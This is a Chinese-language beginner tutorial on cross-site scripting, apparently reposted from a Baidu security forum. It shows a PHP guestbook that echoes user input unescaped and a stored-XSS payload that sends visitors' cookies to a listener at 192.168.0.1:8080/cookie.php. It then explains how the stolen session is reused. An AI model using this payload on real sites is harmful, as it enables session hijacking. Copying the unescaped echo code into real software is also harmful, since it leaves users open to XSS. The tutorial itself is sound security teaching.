Web安全漏洞简介之XSS

随着互联网流行,以及网站互动性的提高,像论坛、微博还有各种web2.0应用的兴起,很多网站都可以由用户或多或少的参与,可能很多的网站用户注册之后都可以评论、发帖等等。

当然这些都是对正常向的用户来说的,如果是一个攻击者当然不会老老实实的发帖子之类的了。

众所周知,现在看到的网页基本都是用html、javascript、css等技术在浏览器端展示的,所以如果一个黑客输入的不是正常的评论,而是一段html、javascript、css等的浏览器支持的代码会如何呢?

下面来做个实验,这里我找了了一个”小明“同学写的简陋的类似留言板的php程序,功能就是简单的把用户提交的东西 再显示回去。

<html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
 <title>测试页面</title>
 </head>
 <body>
 <?php
 if(empty($_REQUEST["T1"]) === false)
 {
 echo "用户留言:".$_REQUEST["T1"];
 }
 ?>
 <form method="POST" action="">
 <p>留言:<br/>
 <textarea class="area-text" style="width: 708px; height: 75px; overflow: hidden;" name="T1"></textarea></p>
 <p><input type="submit" value="提交"></p>
 </form>
 </body>
</html>

 

打开后样子如下:

h3SiQQMAQ9GVx_zDNbVDSUNRoB23BzOMGGrmhhhs7IXjAgAA8QAAAFBO_592x193.png



输入一个你好,上面的用户留言里会显示一个你好,下面来输入一点好玩的

50sD8hWXrua3Fz0uQme3plXrERQ9nd830xipsZgU_j7LAgAAnQAAAFBO_592x129.png



于是当点击提交之后:

2VgtHpEVOtFRAWi8h-XTXHmKu2DLQ-LMMEtaSgwY2iMzBAAAeQEAAFBO_592x207.png



难道这里不应该是在用户留言里显示那句js代码么,让我们来看看页面的html代码在前后两次提交后有什么区别。

第一次:

KFa5mAy-V360agLBpwHsTgYqtcOZIxP8fL2aMpiyR3CvAwAAEwEAAFBO_592x172.png



很正常第二次:

423DKiBuOBL8eNPrdhhpJnEt3kK2FMuP_OV1CNtMirnSAwAALwEAAFBO_592x183.png



注意刚才提交的<script>alert("This is a xsscode")</script>直接就成为web页面代码的一部分。
在这里让我们来回顾下我们的留言板代码,处理用户提交内容的那部分

<?php
 if(empty($_REQUEST["T1"]) === false)
 {
 echo "用户留言:".$_REQUEST["T1"];
 }
 ?>

 首先做了一个判断,检查参数T1是不是为空,之后不为空就执行下面的回显语句,在”用户留言:“后面拼接了T1参数中的内容,再回显到页面上。


可以看到这里,这个粗心的”小明“同学没有对T1的内容做任何检查,就返回给了用户,尼玛起码也得过滤个敏感词啊,网站上面冒个xx功出来要被查水表的。

于是我们就接触到了第一个xss漏洞,也就是跨站脚本,英文Cross-Site Script,这里缩写为了和常见的css(层叠样式表)区分就使用了xss。

xss漏洞很常见,程序员粗心对传入的参数没有检查,或者检查了、处理了,但是狡猾的黑客通过种种手段绕过去了都会造成xss漏洞。

与其他一些漏洞不太相同的是,受到xss漏洞直接攻击的是浏览器端,也就是当一个黑客发起攻击后,实际执行攻击代码的是浏览网站的用户所使用的浏览器,在这个过程中网站的服务器只是起到了一个”帮凶“的作用。

那么这种漏洞有什么危害呢(小明:人也就是弹个框有什么大不了的?)

现在转换一下场景,小明的boss又让小明写了一个论坛程序,各种努力认真,最后搞出了一个炫酷的论坛,用户很多发帖踊跃,boss十分happy。但是他仍然没注意xss漏洞的问题。

让我们用事实来教育小明

IPy9DIrlG4JI_z7E_iecFn2Omebs6cvYyurFE7C1eJ0HAwAATgEAAFBO_592x255.png



我构造了这么一个帖子,标题就叫hello,内容是这样的:

helloworld
<script type=text/javascript>window.location = "http://192.168.0.1:8080/cookie.php?cookie="+document.cookie</script>

 让我们发出去,等等看别人点开之后会发生什么

演示向的程序,我太懒就不整到数据库里存了,脑补下小明点链接的动作就好):

UGrIkPPyUmn7Oqlf7Gg4-Z-W5xTs8Tobyl4jTUWT3UbrAgAAlwAAAFBO_592x119.png



这是什么,小明同学的cookie啊,用户名和密码都大喇喇的写在那里,而且还暴露了小明同学暗恋刘你妹的事情。

让我们来看看这个过程中发生了什么,首先咱们肯定是那个js代码搞的鬼,一共有三个部分

第一,document.cookie,这里获取了来看贴子人的cookie;

第二, "http://192.168.0.1:8080/cookie.php?cookie="+document. cookie 这部将获取到的cookie拼到了那个网址里的一个名为“cookie”的字段里

第三,调用window.location将用户的浏览器指向了这个网址所以最后达到的效果是:把用户的cookie提交给了http://192.168.0.1:8080/coo kie.php 这个网页。

这个网页干了什么呢,很简单的将cookie字段取出然后回显出来。

当然回显出来并不严重,但是如果他是悄悄的存起来了呢?

如果黑客再高级一点,修改一下那个发出去的js代码,利用创建一个图片,将图片地址拼合cookie字段值指向那个cookie.php,然后在cookie.php那里保存并返回一个正常的图片。

oh,no,terrible.

黑客拿到小明的cookie之后,填到他的浏览器里,就能利用小明的身份在论坛上为所欲为了。

看,xss漏洞有多可怕。

======================
可能有人会觉得:“光拿个Cookie弱~爆~了~,老纸的论坛账户没什么用,能奈我何”,可是如果你的浏览器有漏洞,而黑客发了帖子利用xss漏洞扔了段触发漏洞的js,给你按个偷游戏币、网银木马,就真的不好玩了。


而且可怕的是,你明明上的光明正大的论坛,甚至看的是党史党章三观正确无比的帖子,有漏洞的话都会悄无声息的中招。

转自http://anquan.baidu.com/bbs/thread-130625-1-1.html

你可能感兴趣的:(WEB安全)